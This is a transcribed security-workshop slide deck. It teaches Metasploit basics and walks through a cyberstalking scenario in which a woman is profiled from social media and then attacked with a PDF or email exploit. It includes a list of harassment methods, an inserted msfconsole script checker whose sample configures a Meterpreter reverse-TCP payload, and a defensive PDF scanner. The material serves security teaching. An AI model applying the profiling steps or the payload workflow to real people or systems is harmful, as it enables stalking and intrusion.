Practical Exploitation: Introduction to Metasploit, Social Engineering and a few other tools
Speakers
BSc, MSc, CEH, CHFI. Thought I was going to be a PhD, decided to become a ninja instead.
BSc, MSc. Now works for ABBAN. Breaking servers, SIP trunks, and doing research into VoIP and IMS.

Synopsis – wrong order, all content
• Introduction to practical exploitation
• Introduction to cyberstalking
• Introduction to Metasploit
• (short) History of Metasploit
• Modules
• Exploits
• Payloads
• Tools
• Metasploit fundamentals
• Vulnerability scanning
• MSF database commands
• Client-side exploits
• Post exploitation
• Meterpreter
• Armitage
• Social engineering
• SET
• Types of attacks
• Infection media
• Practical workshop
PS: I know you have high hopes that it will go in this order, but it won't; we are not that organized, and apologize in advance.

Workshop
During the practical workshop you will work in pairs, and you will be given the IP address of a virtual machine.
The objective of this workshop is very simple: PWN the living crap out of these virtual machines using techniques that were taught to you during this presentation, read the file password.txt located at Windows/System32 or /home/just4meeting (depending on whether you get a Windows box or a Linux box), and successfully create your own account on the remote system.

Seriouz Business
When presenting, we like to talk about both the fun side of things and the serious implications these “fun things” can have in real life.
During this presentation you will hear a bit about cyberstalking and how these tools work from the perspective of both a cyberstalker and a victim.
To write this part of the presentation we worked alongside the brand new UK National Center for Cyberstalking Research; they are cool people and provided us with lots of data and information.
http://www.beds.ac.uk/nccr/news

Practical exploitation
Q: What do we call practical exploitation?
On the interwebz you can find many definitions created by “security professionals”. We are not (security professionals), so here is our definition of practical exploitation:
Get root, and learn how to use current tools to automate and speed up a penetration test. Understand how to use the tools past a script-kiddie level, i.e. be able to extend the tool's code if needed, or combine multiple tools to achieve a target (!!root!!).
Cyberstalking
Q: What is CYBERSTALKING?
A: Cyberstalking is the use of the internet and/or other electronic means to stalk or harass an individual. However, cyberstalking can be both legal and illegal. (To be explained further.)

Cyberstalking
Q: Who practices cyberstalking?
A: You. Me.

Cyberstalking
“I’VE NEVER CYBERSTALKED!!!!one!!!eleven!!”

Cyberstalking
Remember when two slides back we said cyberstalking could be both legal and illegal? This is what we meant... Let's go through a scenario where cyberstalking would be legal!

Cyberstalking
Meet Tiago. As you can see, Tiago is your average 23-year-old stud. He likes to go out and party, and when he does so he meetssssssssssssss

Cyberstalking
GIRLS! However....

Cyberstalking
Tiago has certain things he likes in girls and things he dislikes!
Tiago, like more than 500 million people, has a Facebook account.
So Tiago goes and does a bit of cyberstalking to decide which girls he wants to be friends with or not, or even possible future girlfriends.

Cyberstalking
Even without adding these girls on Facebook he sometimes gets plenty of information to decide whether he wants to go further with them.

Cyberstalking
So, as you can see, this is an example of a situation where cyberstalking is perfectly acceptable and legal: you access public information about someone that is in the “cyber” world.
This is also something companies sometimes do when they are considering hiring a certain person, to get some background information on them.

Cyberstalking
HOWEVER
Cyberstalking – Scenario 2
Tiago also knows his way around computers, specifically security and the tools used in infosec. He also knows how to check SecurityTube and common security websites for different types of attacks.
BLACKHAT ON!

Cyberstalking – Scenario 2
Analyzing the profiles, Tiago decides he wants to go further and know a bit too much about one of these girls.

Profiling
Tiago starts by getting all sorts of information he can on this girl that might be useful in any way.
From the Facebook profile we get that:
• Her name is Anna Konova
• She is both a Chelsea and Barça fan
• She likes Burberry, fashion events, Domino's pizza, and something called SIFE
• Her favorite music: MJ, Lady Gaga, Beyoncé, Alicia Keys, Cheryl Cole
Using the information collected from this Facebook profile we go to Google...

Profiling
<<- OH LOOK, THE SIFE THING
Quite a few results, let's have a look at a few....

Profiling
From the Facebook profile we get that:
• Her name is Anna Konova
• She is both a Chelsea and Barça fan
• She likes Burberry, fashion events, Domino's pizza, and something called SIFE
• Her favorite music: MJ, Lady Gaga, Beyoncé, Alicia Keys, Cheryl Cole
From Twitter we get 0.
From LinkedIn:
• Project manager at Innovate
• Went to University of Bedfordshire
• Is looking for new career opportunities, etc. etc. etc.
SIFE – SIFE is an international non-profit organization that works with leaders in business and higher education to mobilize university students to make a difference in their communities while developing the skills to become socially responsible business leaders.

Going over the line
How can all this simple, easily accessible information help Tiago cyberstalk someone?
Well, let me introduce you to METASPLOIT.
DEMO 1 – PDF + Email
DEMO

DEMO 1 – PDF + Email
As you can see, it wasn't a hard attack to set up, and easily a real-life scenario.
For those of you who find that attack complicated, we have something for you later on....

A bit more on cyberstalking....
Next we will present some data that was provided to us by the Research Center! Coz stats are always fun n giggles!

Stats (chart): Harasser – environment where they are first met

Stats (chart): Harasser – description

Stats (chart): Fears experienced by those who are harassed

Stats (chart): Consequences for those being harassed
Types of attacks
• Identity theft – controlling the victim's credentials
• Posting false profiles
• Posing as the victim and attacking others
• Discrediting the victim in online communities
• Discrediting the victim in the workplace
• Direct threats through email/instant messaging
• Constructing websites targeting the victim
• Transferring the attack to the victim's relatives
• Use of the victim's image
• Provoking others to attack the victim
• Following the victim in cyberspace

Tools
So what other tools does a cyberstalker have that are easily accessible and have a high ease of use?
• SET
• Metasploit
• Evilgrade
Metasploit
• Exploitation framework
• Lots of other tools and utilities
• First written in Perl
• Then changed to Ruby (THANK GOD)
• 3 versions – Pro, Express, free

Metasploit nowadays...
We won't be able to look at all the different components, so we will try to focus on the more commonly used ones.

Metasploit - Starting

Metasploit - Interaction
There are many ways a user can access Metasploit features:
• msfconsole
• msfgui
• msfweb
• Armitage

Metasploit - msfconsole

Metasploit - msfgui

Metasploit - msfweb

Metasploit - Armitage

Metasploit – Main Modules
• Exploits – main module – used to pwn shit! :]
• Encoders – used to transform raw versions of payloads
• Payloads – used to connect to the shit u pwn!

Metasploit – Quick Intro
Step 1 – Open msfconsole
Step 2 – Choose exploit
Step 3 – Configure exploit and payload
Step 4 – exploit!

Metasploit – Intro DEMO
DEMO 0

Metasploit - Essentials
use module – start configuring a module
show options – show configurable options
set varname value – set an option
exploit – launch an exploit module
run – launch a non-exploit module
sessions -i n – interact with session n
help command – get help for a command
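The Quick Intro steps and the Essentials commands above are a small state machine: select a module, set its options, launch, then interact with the resulting session. The checker below, an added example that is not code from the original slides or from the Metasploit project, models that state over an msfconsole resource (.rc) script and flags the mistakes that usually stall a workshop pair: `set` before `use`, `exploit` or `run` with a required option still unset, or a malformed `sessions -i` id. The module paths are placeholders and the required-option table is this example's own assumption (a real module reports its required options under `show options`); `192.0.2.x` addresses are documentation addresses, not a real target.

```python
"""Added example, not code from the original slides: a checker for an
msfconsole resource (.rc) script that follows the 'use / show options /
set / exploit / sessions -i n' workflow from the Quick Intro and Essentials
slides. It models what each command does to the console state and flags
the mistakes students make in the workshop. Module names are placeholders
and the required-option table is this example's assumption; real modules
report required options via 'show options'."""

import shlex

# Assumption: required options per module (a real module lists them under
# 'show options' with Required = yes). Placeholder module paths.
REQUIRED_OPTIONS = {
    "exploit/example/placeholder_exploit": {"RHOST", "RPORT", "LHOST"},
    "auxiliary/example/placeholder_scanner": {"RHOSTS"},
}

# Commands from the Essentials slide that only display information.
INFO_COMMANDS = {"show", "help", "info", "search"}


def check_resource_script(text, required=REQUIRED_OPTIONS):
    """Return a list of (line_no, message) problems; empty means the script is clean."""
    problems = []
    module = None      # module selected with 'use', if any
    options = {}       # options set on that module so far
    for n, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):   # .rc files allow comment lines
            continue
        try:
            argv = shlex.split(line)
        except ValueError as exc:
            problems.append((n, f"unparseable line: {exc}"))
            continue
        cmd, args = argv[0].lower(), argv[1:]
        if cmd == "use":
            if len(args) != 1:
                problems.append((n, "'use' takes exactly one module path"))
                continue
            module, options = args[0], {}      # a new module starts with a fresh option set
        elif cmd == "back":
            module, options = None, {}
        elif cmd == "set":
            if module is None:
                # msfconsole would accept this (it lands in the global datastore),
                # but it is not the 'use first' workflow taught on the slides
                problems.append((n, "'set' before 'use': no module selected yet"))
            elif len(args) < 2:
                problems.append((n, "'set' needs a name and a value"))
            else:
                options[args[0].upper()] = " ".join(args[1:])
        elif cmd in ("exploit", "run"):        # both launch the selected module
            if module is None:
                problems.append((n, f"'{cmd}' before 'use': nothing to launch"))
                continue
            missing = required.get(module, set()) - set(options)
            if missing:
                problems.append((n, f"'{cmd}' with required options unset: {sorted(missing)}"))
        elif cmd == "sessions":
            if args[:1] == ["-i"] and not (len(args) == 2 and args[1].isdigit()):
                problems.append((n, "'sessions -i' needs a numeric session id"))
        elif cmd not in INFO_COMMANDS:
            problems.append((n, f"unknown command '{cmd}'"))
    return problems


# Constructed sample scripts (placeholder module, RFC 5737 documentation addresses).
GOOD_SCRIPT = """\
# constructed sample: the four Quick Intro steps, then interact with the session
use exploit/example/placeholder_exploit
show options
set RHOST 192.0.2.10
set RPORT 8080
set LHOST 192.0.2.1
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
sessions -i 1
"""

BAD_SCRIPT = """\
set RHOST 192.0.2.10
use exploit/example/placeholder_exploit
set RPORT 8080
exploit
sessions -i one
"""

if __name__ == "__main__":
    for name, script in (("good", GOOD_SCRIPT), ("bad", BAD_SCRIPT)):
        print(name, check_resource_script(script) or "OK")
```

Running it reports the bad script's three problems with their line numbers: the option set before any module was selected (and therefore lost when `use` reset the option set), the launch with `LHOST` and `RHOST` still unset, and the non-numeric session id.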
But but but...
I'm a lazy bastard and I think all the methods you've shown me are too hard

Meterpreter
Meterpreter is COOL
Meterpreter is VERY COOL
Meterpreter, because of a thing called RAILGUN = full access to the Windows API
What does that mean? This is what it means... you cyberstalkers!

Back to seriouz
This is all good fun, but it shows how easily you can “pwn” and cyberstalk someone, or even be cyberstalked. The advice is the usual: antivirus updated, software updated, firewalls up and running (however, that probably won't do you much good).
The 2 best pieces of advice I can give:
Do not read PDFs, or if you do, read them inside Google Chrome (coz at least you're sandboxed n shit :D)
ANDDDDDDDDDDD
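Demo 1 delivered the payload as a PDF attachment, and the advice above is to treat PDFs with suspicion. On the receiving side, a mail gateway can do part of that job before anyone opens the file. The scanner below is an added example, not code from the original slides or from any product they mention: it flags the PDF features those attachments rely on (an automatic open action, embedded JavaScript, launch actions, embedded files), and it decodes `#xx` name escapes and inflates FlateDecode streams first, because both are common ways of hiding those keys from a plain grep. The two sample documents are constructed inline, and the risk weights and quarantine threshold are this example's own assumptions.

```python
"""Added example, not code from the original slides: a mail-gateway style
check that flags the PDF features abused in 'open this PDF' client-side
attacks like Demo 1 (automatic open actions, embedded JavaScript, launch
actions, embedded files). It looks inside FlateDecode streams and decodes
'#xx' name escapes, because both are routinely used to hide these keys from
naive grep-style scanners. Sample PDFs are constructed inline; the risk
weights and the quarantine threshold are this example's own assumptions."""

import re
import zlib

# PDF name keys worth flagging. Weights are an assumption for this example.
RISKY_NAMES = {
    b"/OpenAction": 2,    # action executed as soon as the document opens
    b"/AA": 2,            # additional-actions dictionary (page/field events)
    b"/JavaScript": 3,
    b"/JS": 3,
    b"/Launch": 3,        # launches an external application
    b"/EmbeddedFile": 1,
    b"/RichMedia": 1,
}

_NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")          # /Open#41ction -> /OpenAction
_STREAM = re.compile(rb"stream\r?\n(.*?)\nendstream", re.DOTALL)


def normalise_names(data):
    """Decode PDF name escapes so obfuscated keys compare equal to plain ones."""
    return _NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data):
    """Return the contents of every stream that inflates cleanly as zlib data."""
    out = []
    for m in _STREAM.finditer(data):
        try:
            out.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not FlateDecode (image data, already plain, etc.): skip
    return out


def scan_pdf(data):
    """Return {name: count} of risky names in the raw file and its inflated streams."""
    if not data.startswith(b"%PDF-"):
        raise ValueError("missing %PDF- header")
    hits = {}
    for layer in [data] + inflate_streams(data):
        text = normalise_names(layer)
        for name in RISKY_NAMES:
            # a name ends at whitespace or a delimiter; the lookahead stops /JS matching /JSX
            count = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", text))
            if count:
                key = name.decode()
                hits[key] = hits.get(key, 0) + count
    return hits


def risk_score(hits):
    return sum(RISKY_NAMES[k.encode()] * n for k, n in hits.items())


def verdict(data, threshold=3):
    """('allow' | 'quarantine', hits); threshold is an assumption for this example."""
    hits = scan_pdf(data)
    return ("quarantine" if risk_score(hits) >= threshold else "allow", hits)


# Constructed sample: a minimal benign document.
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
    b"%%EOF\n"
)


def _build_suspicious():
    # Constructed sample: the catalog's open action is written with a name
    # escape and the action dictionary is stored deflated, as evasive samples
    # do to slip past plain-text matching. The script body is a placeholder.
    action = zlib.compress(b"<< /S /JavaScript /JS (constructed placeholder) >>")
    return (
        b"%PDF-1.5\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /Open#41ction 4 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
        b"4 0 obj << /Length " + str(len(action)).encode() + b" /Filter /FlateDecode >>\n"
        b"stream\n" + action + b"\nendstream\nendobj\n"
        b"%%EOF\n"
    )


SUSPICIOUS_PDF = _build_suspicious()

if __name__ == "__main__":
    for label, pdf in (("benign", BENIGN_PDF), ("suspicious", SUSPICIOUS_PDF)):
        print(label, verdict(pdf))
```

A grep for `/OpenAction` or `/JavaScript` finds nothing in the suspicious sample, because one key is escaped and the other sits in a compressed stream; after normalisation and inflation the scanner sees both and quarantines the file. The same keys do occur in legitimate forms and interactive documents, which is why the output is a weighted score rather than a yes/no, and why a gateway would pair it with sandboxed rendering rather than relying on it alone.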
KUDOS
FILIPE REIS!!!!!!! ONEELEVEN!!!!! And more FILIPE REIS! He helped record the demos and is awesome.
Center for Research on Cyberstalking for the data provided.
The girls for accepting that we had to stay up late.
Oh, and Chris Bockermann, Bruno Morisson and Oli for allowing me to go home yesterday to write these slides instead of getting us drunk.

Editor's Notes

  • #23 Play DEMO 0
  • #24 DEMO 1 – PDF; DEMO 1 – EMAIL
  • #43 Play DEMO 0
  • #48 DEMO 3 – Armitage FINAL
  • #50 DEMO 2 – KEYBD; DEMO 2 – C